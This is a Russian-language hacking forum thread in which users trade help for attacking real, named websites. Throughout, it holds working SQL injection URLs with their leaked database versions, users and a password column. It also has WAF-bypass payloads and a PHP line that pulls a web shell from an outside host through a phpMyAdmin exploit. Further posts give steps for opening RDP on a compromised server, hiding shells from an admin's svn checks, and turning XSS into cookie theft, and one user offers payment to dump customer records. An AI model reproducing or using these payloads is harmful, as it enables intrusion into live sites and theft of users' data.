1'+and+(select*from(select+count(*)from(select+1+u nion+select+2+union+select+3)x+group+by+concat(mid ((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES +limit+0,1),1,64),floor(rand(0)*2)))z)+and+'1

спасибо FlaktW

@попугай

если мы речь ведем про мускуль имеет место вот такое:

insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')

insert into TABLE (id, subid, date, data) values ('666', 'SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3','1','1')

это так сказать в защиту моей теории

xa-xa89 said:
@попугай
если мы речь ведем про мускуль имеет место вот такое:
insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')
insert into TABLE (id, subid, date, data) values ('666', '
SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3
','1','1')
это так сказать в защиту моей теории



values ( скобкой не закрыта

Kuteke said:
Помогите со скульей:

HTML:
http://www.gasniergicquel.com/customer/home.php?cat=2


HTML:
http://www.gasniergicquel.com/customer/help.php?section=presentation





Code:
http://www.gasniergicquel.com/customer/home.php?cat=2'and(select*from(select(name_const(( select(concat_ws(0x3a,version(),user()))),1)),name _const((select(concat_ws(0x3a,version(),user()))), 1))a)and'

sourcec0de, спасибо! Помоги и этим:


HTML:
http://www.proximeety.gr/member-321531[sql].html


P.S. Сообщение не цитируйте, пожалуйста!

P.P.S. Модеры, не удаляйте это сообщение!

Помогите скуль крутануть. Бред, не получается нихера = \

_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683

GroM88 said:
Помогите скуль крутануть. Бред, не получается нихера = \
_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683


Там нету скули. Пропускаются только цифровые значения.


Kuteke said:
http://www.proximeety.gr/member-321531[sql].html
P.S. Сообщение не цитируйте, пожалуйста!
P.P.S. Модеры, не удаляйте это сообщение!


Специально буду цитировать твои сообщения, потому что ты поступаешь не по феншую.

Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(

вот код запуска, мб я что-то напутал?


Code:
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

а по моему это все делается через net start

Ulitko said:
Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(
вот код запуска, мб я что-то напутал?


Тебе нужно убедиться, что стандартный rdp порт для тебя будет открыт на фаере шлюза. Во-вторых, нужно добавить юзера, с которым заходишь, в группу remoteusers или как-то так. Ну и в-третьих, проще залить что-нибудь туда, что само даст мордочку, имхо, если есть возможность, конечно.

друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:


Code:
DB Error: syntax error
SELECT login, password FROM emps WHERE login = '' or 1=1 --'
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2]

а если 'admin' or "1"="1" /* то:


Code:
DB Error: unknown error
SELECT login, password FROM emps WHERE login = 'admin' or "1"="1" /*'
[nativecode=144 ** Table './tradtyru/emps' is marked as crashed and last (automatic?) repair failed]

Скажите, я все правильно делаю и все правильно кто-то уже сделал до меня, зарегав пользователя "; DROP TABLE", или я чего-то не учитываю?

P.S. не называю сайт, хочу сам расковырять, если возможно.

rad_scorp said:
Тебе нужно убедиться, что стандартный rdp порт для тебя будет открыт на фаере шлюза. Во-вторых, нужно добавить юзера, с которым заходишь, в группу remoteusers или как-то так. Ну и в-третьих, проще залить что-нибудь туда, что само даст мордочку, имхо, если есть возможность, конечно.


насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?

Ulitko said:
насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?


Хм, что-то выдумать, кроме vnc, ничего не могу. Может, сообщество ау?

А начни проще, у тебя порт слушается? netstat?

введя нетстат, выдало дохрена подключений.

дохрена подключений.


дохрена подключений по rdp?

ты уверен что служба рдп запущенна что бы ее открывать в фаерволе?

просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится!

net start TermService

как то так вроде.

@rad_scorp

судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.

а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.

у тебя какая версия?

Ulitko said:
введя нетстат, выдало дохрена подключений.


Хм. Да, не так все просто, как все сложно, но ман нетстата почитать неплохо бы.

Держи:


Code:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -a -n | findstr "3389"

Это разрешает соединения к терминальному серверу и затем удостоверяется, что сервис up and running. Это та самая галочка во вкладке свойств моего компьютера. В xp фаер вроде не мешает, если мешает - можно выключить. На 2008 (а значит, и, скорее всего, в 7) мы сталкивались с тем, что сервак увезли, а включить rdp забыли, и так просто туда не долезть. Тогда надо в реестре у фаера пару правил поправить, но сейчас не вспомню, если надо, в понедельник в личку пиши.

Если слушающего порта не появилось, то я не нашел, как ТС включить без перезагрузки. У меня net start "Terminal Services" не работает.

xa-xa89 said:
@rad_scorp
судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
у тебя какая версия?


Не знаю, пока предположений нет. Попробовать union чтобы хоть какие-то версии отсечь? И такую ли ошибку выдает?

xa-xa89 said:
дохрена подключений по rdp?
ты уверен что служба рдп запущенна что бы ее открывать в фаерволе?
просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится!
net start TermService
как то так вроде.
@rad_scorp
судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться.
а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку.
у тебя какая версия?


просто помимо сайта, на компе стоит сервер одной MMORPG игры) Вот по этому и дохрена подключений)

С помощью эксплойта через phpMyAdmin/scripts/setup.php

выводит phpinfo();

allow_url_fopen on

magic_quotes_gpc on

при попытке залить полноценный шелл с помощью такой конструкции


PHP:
file_put_contents('wso.php',file_get_contents('htt p://www.*********.com/wso/******.txt'));

одинарная кавычка экранируется обратным слешем \'

тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0

пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло

Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование

и залить полноценный шелл.

Sloneny said:
С помощью эксплойта через phpMyAdmin/scripts/setup.php
выводит
phpinfo();
allow_url_fopen on

magic_quotes_gpc on
при попытке залить полноценный шелл с помощью такой конструкции

PHP:
file_put_contents('wso.php',file_get_contents('htt p://www.*********.com/wso/******.txt'));

одинарная кавычка экранируется обратным слешем \'
тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0
пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло
Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование
и залить полноценный шелл.


просто stripslashes делай

PHP:
file_put_contents($_GET[a],file_get_contents($_GET[b]));&a=wso.php&b=http://evilsite.ru/shell.txt

PHP:
file_put_contents($_GET[a],file_get_contents($_GET[b]));&a=wso.php&b=http://evilsite.ru/shell.txt

как ни старался не сработало

Совсем забыл написать, в эксплойте используется такая конструкция


PHP:


при попытке заменить ее на что либо другое, или матерится или выдает пустую страницу

Никак не могу найти примера работы с stripslashes()

везде написано что он удаляет экранирование символов

но как его применить?

К сожалению с php не очень дружу

2Sloneny скинул решение в ПМ, посмотри если выйдет то опишу тут полноценно.

rad_scorp said:
друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то:

Code:
DB Error: syntax error
SELECT login, password FROM emps WHERE login = '' or 1=1 --'
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2]



После коментария пробел поставь

есть скуля


Code:
http://www.feb.spb.ru/news.php?id=100+union+select+1,column_name,3,4,5,6 ,7+from+information_schema.columns+limit+1,1111--

хочу сдампить колонки БД с помощью программы rsaUnDumper[sql] 2.0.exe

делаю все как положено


GET http://www.feb.spb.ru/news.php?id=100+union+select+1,,3,4,5,6,7+from+inf ormation_schema.columns+limit+,1111-- HTTP/1.0 User-Agent: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53 Host: www.*****.ru Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: identity, *;q=0


но ничего не дампиться даже ошибки не выводятся

просто выводится


Запросов 10 сохранено 0 ошибок 0


Пробовал запрос без --, пробовал удалять все что ниже --

безрезультатно

А в ручную все идет нормально.

Подскажите что я не так делаю?

Ссылка на дампер http://www.sendspace.com/file/ee74kx

Samael91 said:
есть скуля

Code:
http://www.feb.spb.ru/news.php?id=100+union+select+1,column_name,3,4,5,6 ,7+from+information_schema.columns+limit+1,1111--

хочу сдампить колонки БД с помощью программы rsaUnDumper[sql] 2.0.exe
делаю все как положено
но ничего не дампиться даже ошибки не выводятся
просто выводится
Пробовал запрос без --, пробовал удалять все что ниже --
безрезультатно
А в ручную все идет нормально.
Подскажите что я не так делаю?
Ссылка на дампер http://www.sendspace.com/file/ee74kx


забей сылку в sqlmap,Havij или руками делай запрос!(честно не вижу смысла в этих дамперах)

sourcec0de said:
После коментария пробел поставь


Спасибо, чувак, ты прав, учту. Но базы там покорраптило в хлам. Будем ждать, пока починят.

вот начал учить скуль иньекции

подскажите плиз как узнавать имена таблиц?

спасибо.

Киев said:
вот начал учить скуль иньекции

подскажите плиз как узнавать имена таблиц?

спасибо.


ыы самый тяжелый способ это подбирать ручками, например users, admins, members и т.д. Еще есть проги для подбора таблиц по словарям. можно поискать на форуме

а вообще тут смотря к чему таблицы. Если к извесным форумам то таблицы извесны (если их не поменяли). Например таблица юзеров phpbb форума называется phpbb_users. Если это 5 версия Мускула или MSSQL то таблицы можно увидеть через information_schema.tables.

На серве стоит svn и админ почти ежедневно им пользуется. Мои шеллы и изменения на раз палятся командой

svn status

Как скрыться?

пробовал svn add /path/to/shell.php (Вроде добавляет файл в снимок файловой системы)

Все равно status показывает мои изменения.

попугай said:
На серве стоит svn и админ почти ежедневно им пользуется. Мои шеллы и изменения на раз палятся командой
svn status
Как скрыться?
пробовал svn add /path/to/shell.php (Вроде добавляет файл в снимок файловой системы)
Все равно status показывает мои изменения.


Не уверен на 100%, но

Сделать отдельную бранчу, в этой бранче сделать коммит шелла. В логах транка не должны светиться сие действия. Для верности в бранче сделать изменения во всех файлах (добавить по одной строке) и коммитить не шелл, а добавить строку выполнения команды.

собственно вопрос как узнать префикс таблиц в joomla? попалась инъекция mysql4 дефолтный jos не катит...

Что можно сделать если есть вот такая sql injection:


Code:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28C OUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNIO N%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29 %29%23%20UNION%20SELECT%201%20--%20%20%27

При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано


Запрос небезопасен и был отвергнут.

jawbreaker said:
Что можно сделать если есть вот такая sql injection:

Code:
http://mirplombir.ru/index.php?searchstring=1\\%27%29%29or%28SELECT%28C OUNT%28*%29%29FR%20%20OM%28%28SELECT%281%29%29UNIO N%28SELECT%282%29%29UNION%28SELECT%283%29%29%29x/**/GROUP/**/BY/**/MID%28VERSION%28%29,FLOOR%28RAND%280%29*2%29,64%29 %29%23%20UNION%20SELECT%201%20--%20%20%27

При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано


Попробовать здесь.


http://mirplombir.ru/index.php?news=2'and(select*from(select(name_const (version(),1)),name_const(version(),1))a)and'


Duplicate column name '5.1.50-lk-log'

er9j6@ said:
Попробовать здесь.

Code:
http://mirplombir.ru/index.php?news=2'and(select*from(select(name_const (version(),1)),name_const(version(),1))a)and'

Duplicate column name '5.1.50-lk-log'


name_const здесь не надо использовать в связи с ее особенностями на разных версиях маскула. Кроме констант ты ничего не выведешь, да и вопрос состоял в другом, а именно


jawbreaker said:
При этом во время моих экспериментов часто перебрасывает на сайт хостера, где написано

Code:
Запрос небезопасен и был отвергнут.



Это фильтрация на последовательность union select from

Один из вариантов обхода


Code:
http://mirplombir.ru/index.php?news=2'and(0)union%0Aselect+version(),2, 3+from+information_schema.tables--+

Удачно подобрал нужную таблицу в PostgreSQL, но вывести колонки не получается.

Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+inf ormation_schema.columns+where+table_name=chr(106)| |chr(111)||chr(115)||chr(95)||chr(117)||chr(115)|| chr(101)||chr((114)||chr(115) --

Вывод: FUNCTION modx1.chr does not exist

Судя по ошибке двиг "modx" и в нём нету по-умолчанию "char";

Запрос: http://www.site.com/index.php?id=246+union+select+column_name+from+INF ORMATION_SCHEMA.columns+where+TABLE_name=jos_users--

Вывод: Unknown column 'jos_users' in 'where clause'

В чём моя ошибка? Как вывести колонки из таблицы jos_users ?

попробуй jos_users занести в кавычки или в hex переведи

Привет, есть вопрос по заливке шелла через error based sqli.

Допустим есть запрос вида:


Code:
index.php?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((S ELECT+USER()),floor(rand(0)*2)))+--+



Code:
Duplicate entry 'root@localhost1' for key 1

Так вывожу имена таблиц:


Code:
?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((S ELECT+TABLE_NAME+FROM+information_schema.tables+LI MIT+0,1),floor(rand(0)*2)))+--+

Путь известен.

Как действовать дальше?

Да чуть не забыл, соль в том, что mq=on.

fl00der said:
Привет, есть вопрос по заливке шелла через error based sqli.
Допустим есть запрос вида:

Code:
index.php?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((S ELECT+USER()),floor(rand(0)*2)))+--+


Code:
Duplicate entry 'root@localhost1' for key 1

Так вывожу имена таблиц:

Code:
?id=1+or+(select+count(*)+from+(select+1+ union+select+2+union+select+3)x+group+by+concat((S ELECT+TABLE_NAME+FROM+information_schema.tables+LI MIT+0,1),floor(rand(0)*2)))+--+

Путь известен.
Как действовать дальше?
Да чуть не забыл, соль в том, что mq=on.


Я на 100% не уверен, если mq=on, залить шелл не удастся

er9j6@ said:
Я на 100% не уверен, если mq=on, залить шелл не удастся


Все правильно, с mq не зальешь шелл через скулю, но ты можешь читать файлы через load_file(HEX)

есть вопрос:

собственно найти путь на сайте,всё перепробовал сайт на Windows NT

знаю,что только mysql установлен в C:\Program Files\MySQL\MySQL Server 5.1\ и могу прочитать C:\Program Files\MySQL\MySQL Server 5.1\my.ini

как ещё можно узнать где лежит дира с самим сайтом?

есть ли уязвимость в это коде (perl) :

if ( $section eq "view_file" ) {

check_user();

$file = $q->param('id');

my $statement = 'SELECT nid,filename, file FROM files WHERE id = ?';

$sth = $dbh->prepare($statement) or die print "Couldn't prepare statement: $DBI::errstr; stopped";

$sth->execute($file) or die print "Couldn't execute statement: $DBI::errstr; stopped";

while ( my $ref = $sth->fetchrow_hashref() ) { $nid = $ref->{'nid'}; $name = $ref->{'filename'}; $filename = $ref->{'file'}; }

$statemente = 'SELECT notes.call FROM notes WHERE id = ?';

$sth = $dbh->prepare($statemente) or die "Couldn't prepare statement: $DBI::errstr; stopped";

$sth->execute($nid) or die "Couldn't execute statement: $DBI::errstr; stopped";

while ( my $ref = $sth->fetchrow_hashref() ) {

$call = $ref->{'call'};

}

$statement = 'SELECT username FROM calls WHERE id = ?';

$sth = $dbh->prepare($statement) or die "Couldn't prepare statement: $DBI::errstr; stopped";

$sth->execute($call) or die "Couldn't execute statement: $DBI::errstr; stopped";

while ( my $ref = $sth->fetchrow_hashref() ) {

die_nice("Sorry you do not have access to this file") if $ref->{'username'} ne "$Cookies{'id'}";

}

print qq~Content-Disposition: attachment; filename="$name"\n~;

print "Content-Type: application/octet-stream\n\n";

if ( defined $file && $file ne "" ) {

open( LOCAL, ") {

print;

}

close(LOCAL);

}

}

все время открывается сам файл с ошибкой внутри в строке while () {

Faaax said:
попробуй jos_users занести в кавычки или в hex переведи


Первым делом, так и сделал, но результат не оправдал ожидания. Вопрос остаётся актуальным!

Faaax said:
есть вопрос:
собственно найти путь на сайте,всё перепробовал сайт на Windows NT
знаю,что только mysql установлен в C:\Program Files\MySQL\MySQL Server 5.1\ и могу прочитать C:\Program Files\MySQL\MySQL Server 5.1\my.ini
как ещё можно узнать где лежит дира с самим сайтом?


поищи php.ini (тут где то была тема с путями для брута)

Как определить название БД, к которым относятся найденные таблицы?

Т.е название таблицы есть (в моём случае user), но если в запросе указать просто "from user", то вываливается ошибка Table doesn't exist.

Запрос ' and extractvalue(rand(),concat(0x3a,version(),0x3a,dat abase()))-- 1 выводит неверное название БД.

MySQL 5.1.56, если что.

Systematis said:
Как определить название БД, к которым относятся найденные таблицы?
Т.е название таблицы есть (в моём случае user), но если в запросе указать просто "from user", то вываливается ошибка Table doesn't exist.
Запрос ' and extractvalue(rand(),concat(0x3a,version(),0x3a,dat abase()))-- 1 выводит неверное название БД.
MySQL 5.1.56, если что.


select group_concat(table_schema) from information_schema.tables where table_name='user'

если magic_quotes=on(экранирование спец символов), то надо перевести user в hex и писать table_name=0x75736572 вместо table_name='user'

Через запятую вывалит названия баз не больше первых 1кб(т.е. если баз дофига, то group_concat может вернуть не все).

Или на примере верхних двух постов (https://antichat.live/showthread.php/p/2784829/)

Подскажите, как крутить MS Access http://www.kzr.spb.ru/news-temp.asp?id=-1' ?

Друззя, снова я. Сразу к делу:


Code:
http://site.pl/humor.php?id=17%20and%201=0%00union select group_concat(@@version),2,3,4,5,6,7,8,9,0 --

Вот до чего приблизительно дошел, но проблема в том, что union блочится в какой-то момент, и нам по-польски предлагают пойти куда подальше. Как видите, null byte пробовал, ничего. Чем еще можно попробовать?

upd: То есть, если в адресе есть union или ";", редирект на отдельную страничку с угрозами скорой расправы.

rad_scorp said:
Друззя, снова я. Сразу к делу:

Code:
http://site.pl/humor.php?id=17%20and%201=0%00union select group_concat(@@version),2,3,4,5,6,7,8,9,0 --

Вот до чего приблизительно дошел, но проблема в том, что union блочится в какой-то момент, и нам по-польски предлагают пойти куда подальше. Как видите, null byte пробовал, ничего. Чем еще можно попробовать?
upd: То есть, если в адресе есть union или ";", редирект на отдельную страничку с угрозами скорой расправы.


Это WAF.

Узнай что именно попадает под WAF, UNION или же UNION SELECT или же что-то еще.

И пробуй обойти, способов много.

Погугли на тему WAF Bypass, так же от Ефтеева есть презентация с некоторыми способами обхода WAF.

Как варианты попробуй:


17+and+1=0+/*!union select*/ group_concat(@@version),2,3,4,5,6,7,8,9,0--+




17+and+1=0+/*!union*/ select group_concat(@@version),2,3,4,5,6,7,8,9,0--+




17+and+1=0%0aunion%0aselect%0agroup_concat(@@versi on),2,3,4,5,6,7,8,9,0--+

Только учу sql injection.

Нашел сайт, вбил в поиск - 123' выдало


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123'' IN BOOLEAN MODE)' at line 1


смущает IN BOOLEAN MODE (да...sql надо подучить) принцип тот же самый?

wkar said:
Подскажите, как крутить MS Access http://www.kzr.spb.ru/news-temp.asp?id=-1' ?


http://www.kzr.spb.ru/news-temp.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+msysac cessobjects

Tigger said:
Как варианты попробуй:


Да, это waf. Блокирует слово union "as such", под любым соусом в GET. Ищу возможность его как-то разбить на части, но похоже это невозможно.

Вот что можно:


Code:
like
concat
group_concat
version
id=(1)
symbols: # -- /**/ ()

А это нельзя:


Code:
union
select
update
insert

symbols: ; ,

попробуй post'ом

Форум IPB 3.2.0,нашел раскрытие пути


Code:
Warning: Illegal offset type in /var/admin/setup/sources/classes/output/output.php on line 248

По такому адресу:


Code:
_http://insider.net.kg/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login

Как можно юзать уязвимость? Можно ли провести как то sql иньекцию? Очень нужно пролезть в бд)

Заранее спс,за совет.

alerondel said:
Форум IPB 3.2.0,нашел раскрытие пути

Code:
Warning: Illegal offset type in /var/admin/setup/sources/classes/output/output.php on line 248

По такому адресу:

Code:
_http://insider.net.kg/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login

Как можно юзать уязвимость? Можно ли провести как то sql иньекцию? Очень нужно пролезть в бд)
Заранее спс,за совет.


ну нахсел раскрытие..и что дальше? это не относится к багам которые дают доступ к БД..ищи сплоиты под эту версию форума..или баги приват покупай

shell_c0de said:
попробуй post'ом


Пробовал, даже куками, кажется.

Пробовал HPP (или HPF, я пока еще не разбираюсь ). В таком виде: id=5 and 1=0 un&id=ion итд, может, конечно, не так составил, но не заработало.

Хорошо забаррикадировались, собаки. На самом деле, насколько я могу судить, хороший, годный waf. Он анализирует строчку REQUEST_URI, я так подозреваю, потому что &asd=union вываливает ошибку тоже.

Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?

wkar said:
Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?


Только blind.

http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)

wkar said:
Как крутить такую скулю http://www.mybiz.ru/article.php?id=32 ?


Если белая страница, или вырубает на главную, значит запрос неверный, что тут непонятного??


er9j6@ said:
Только blind.
http://www.mybiz.ru/article.php?id=32/**/and/**/substring(version(),1,1)=5--+%20(true)


Поля подобрать можно их 14

Faaax said:
есть вопрос:
собственно найти путь на сайте,всё перепробовал сайт на Windows NT
знаю,что только mysql установлен в C:\Program Files\MySQL\MySQL Server 5.1\ и могу прочитать C:\Program Files\MySQL\MySQL Server 5.1\my.ini
как ещё можно узнать где лежит дира с самим сайтом?


всё ещё нуждаюсь в ответе как найти?

Faaax said:
всё ещё нуждаюсь в ответе как найти?


Смотря, какой сервер стоит

Здравствуйте.

Есть доступ к бд сайта на wordpress, но проблема в том что я не знаю адрес самого сайта 0_о

Внимание вопрос:

Можно ли узнать адрес ресурса на wordpress имея доступ к его БД? И если можно то подскажите в какой таблице искать плиз.

Kudos said:
Здравствуйте.
Есть доступ к бд сайта на wordpress, но проблема в том что я не знаю адрес самого сайта 0_о
Внимание вопрос:
Можно ли узнать адрес ресурса на wordpress имея доступ к его БД? И если можно то подскажите в какой таблице искать плиз.


/thread229555.html

Kudos said:
Здравствуйте.
Есть доступ к бд сайта на wordpress, но проблема в том что я не знаю адрес самого сайта 0_о
Внимание вопрос:
Можно ли узнать адрес ресурса на wordpress имея доступ к его БД? И если можно то подскажите в какой таблице искать плиз.


Таблица:

wp_options

в ней данные о урл блога

Code:
http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x

не пойму как дальше таблицы и колонки вывести

Code:
http://www.linleygroup.com/events/event.php?num=-500000+/*!UnION*/+/*!SElECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+

Прошу помощи в раскрутке.

fl00der said:

Code:
http://www.linleygroup.com/events/event.php?num=-500000+/*!UnION*/+/*!SElECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+

Прошу помощи в раскрутке.




http://www.linleygroup.com/newsletters/newsletter_detail.php?num=4722&year=2011&tag=3'+and+(select*from(select+count(*)/*!from*/(select+1+/*!union*/+select+2+/*!union*/+select+3)x+group+by+concat(mid((select+/*!concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os)*/+/*!from*/+information_schema.columns+where+/*!column_name*/+like+0x257061737325+and+not+table_schema=0x696e66 6f726d6174696f6e5f736368656d61+limit+1,1),1,64),fl oor(rand(0)*2)))z)+and+'1


MySQL Error: Duplicate entry '5.0.92-community:linley5_tlgcms:linley5_linley5@localhost :unknow' for key 1


http://www.linleygroup.com/newsletters/newsletter_detail.php?num=4722&year=2011&tag=3'+and+(select*from(select+count(*)/*!from*/(select+1+/*!union*/+select+2+/*!union*/+select+3)x+group+by+concat(mid((select+/*!concat_ws(0x3a,table_schema,table_name,column_na me)*/+/*!from*/+information_schema.columns+where+/*!column_name*/+like+0x257061737325+and+not+table_schema=0x696e66 6f726d6174696f6e5f736368656d61+limit+2,1),1,64),fl oor(rand(0)*2)))z)+and+'1


MySQL Error: Duplicate entry 'linley5_tlgcms:cms_accounts: password1' for key 1

Faaax said:

Code:
http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x

не пойму как дальше таблицы и колонки вывести


http://www.euromet.ru/search/?search=ololo'%20and%20updatexml(0x03b,concat(0x3b ,(select%20table_name%20FROM%20information_schema. tables%20limit%200,1)),0x03b)--%20x

Error Number: 1105 XPATH syntax error: ';CHARACTER_SETS'

=\\

Что можно с этим сделать?

http://s46.radikal.ru/i113/1109/b9/de8b57497d0f.jpg

Полный размер (http://s13.radikal.ru/i186/1109/97/831217ac90a8.jpg)

И что это за хеши внизу, точнее от чего они?

Codeblo said:
Сообственно Для Профи:
Есть вот это:
Выдает вот это:
]
Как мне сообщил уважаемый, ник называть не буду.
длина кейворда превышает максимум
но почему то синтакс еррор выдает
Сообственно интересует Можно ли как то раскрутить и похекать это шоп?
PS: За реальную помощь, 300Z в Пм или icq, если получится раскрутить. Я просто не знаю что с ним делать.


Похекать шоп не получится, так как стоит 4 ветка MySQL.


http://www.the-ice-man.co.uk/prodisp.php?prodcatind=1&subcatind=1&pageind=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os),16+--+


4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu

При регистрации в поле вопрос я ввел ">alert(/XSS/) потом взял поле востановить пароль ввел свой логин и код с картинки, потом меня переадресовует на страницу с вопросом и тогда высвечиваеться /XSS/

Вопрос: как сделать из этого снифер? И пожалуйста скажите когда я кину ссылку админу и он не будет авторизован на сайте то его куки не крадуться?(То есть нужно чтобы он был авторизован на сайте?)

проблемка есть....соснифал куки админа, меняю куки на его... рефрешу линку на админку... ноль эмоций. недоступен урл.

может быть привязка к ip? есть еще варианты?

er9j6@ said:
Похекать шоп не получится, так как стоит 4 ветка MySQL.
4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu


нет доступа к inf. schema - не значит, что похекать не получится.

er9j6@ said:
Похекать шоп не получится, так как стоит 4 ветка MySQL.


Всё получиться

То что стоит что четвёртая версия, это значит что только невозможно узнать названия таблиц.

Префикс таблиц: 'theqice_'

Дорк:


Code:
inurl:"prodisp.php?prodcatind"

Почти везде есть SQL-inj. Получаем доступ к одному из сайтов. Узнаём CMS/Названия таблиц. Ну а потом(Чисто теоретически) почти всех в этом списке, в том числе и ваш сайт можно похекать.

а не проще поставить такой двиг себе на машину?)

Codeblo said:
Сообственно Для Профи:
Есть вот это:
Выдает вот это:
]
Как мне сообщил уважаемый, ник называть не буду.
длина кейворда превышает максимум
но почему то синтакс еррор выдает
Сообственно интересует Можно ли как то раскрутить и похекать это шоп?
PS: За реальную помощь, 300Z в Пм или icq, если получится раскрутить. Я просто не знаю что с ним делать.


вынужден вас огорчить - колонка с номер карты зашифрована, и судя по длине, обратно расшифровать не получится

Codeblo said:
Интересует вопрос о Номером карты какой вы имеете в виду? Если вы про сс Карты то мне с Сайта не нужны не карты -не пароли юзеров, мне нужен дамп юзеров , фио мыло товары суммы и т.д Если вы конечно про это имели ввиду.


скинул названия таблиц + колонок в ПМ

Как залить шел в vBulletin 4.0.3 если есть доступ к админке?

Вот таблицы в admincp

http://s54.radikal.ru/i145/1109/d7/0ef37d051d20.jpg

http://s012.radikal.ru/i321/1109/c3/2a1696f5f82f.jpg

Что нажимать? просто я нап первый раз заливаю шел

~{OmRus}~ said:
Как залить шел в
vBulletin




/thread22852.html

vasykas said:
/thread22852.html


Те что пишут:

Способ заливки шелла в vBulletin 3.5.*.

Способ заливки шелла в vBulletin 2.*.* и 3.0.*

Я пробивал и нечего не получилось... Писало Error на линии 1010

~{OmRus}~ said:
Те что пишут:
Способ заливки шелла в vBulletin 3.5.*.
Способ заливки шелла в vBulletin 2.*.* и 3.0.*
Я пробивал и нечего не получилось... Писало Error на линии 1010


все страницы полистай там их 13

vasykas said:
все страницы полистай там их 13


Нечего не работает пишет что на сторочке такой то ошибка Как еще залить?

nginx Buffer Underflow Vulnerability

Как юзать?

Довел 1 сайт до:


Ошибка: Ошибка базы данных - Illegal mix of collations (ascii_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation '='


Суть в том, что есть некая страница page.html?...&c=

... — некоторые параметры, не в них суть.

&c= — можно указать что угодно. Если указать какой-нибудь некорректный знак выдает эту ошибку.

Что можно с этим сделать?

Также есть страницы newsN.html (где N — номер новости).

Видимо расширение сделано с помощью .htaccess, т.к. можно ввести даже news-1.html ; news9999999999.html — и страница откроется (новость пустая, но открывается же).

Можно с этим что-то сделать?

news2.html true

news1+1.html true

news3'.html false

как blind можно попробовать.

Нашел на одном сайте PMA v2.11.9 со скриптом установки setup.php. PHP стоит 5.2.10. Попробывал все доступные экспы по RCE - и через ftp и через сессии от Snipper`а, а результата нет.

При использовании экспа для ftp выводил phpinfo(); exit; конструкции. Должно было вывалится окно phpinfo, но на выводе все равно только стандартное окно установшика.

Прошу помощи у знатоков. В чем может быть причина?

shell_c0de said:
news2.html true
news1+1.html true
news3'.html false
как blind можно попробовать.


news2.html - заходит

news1+1.html - выдает первую страницу?

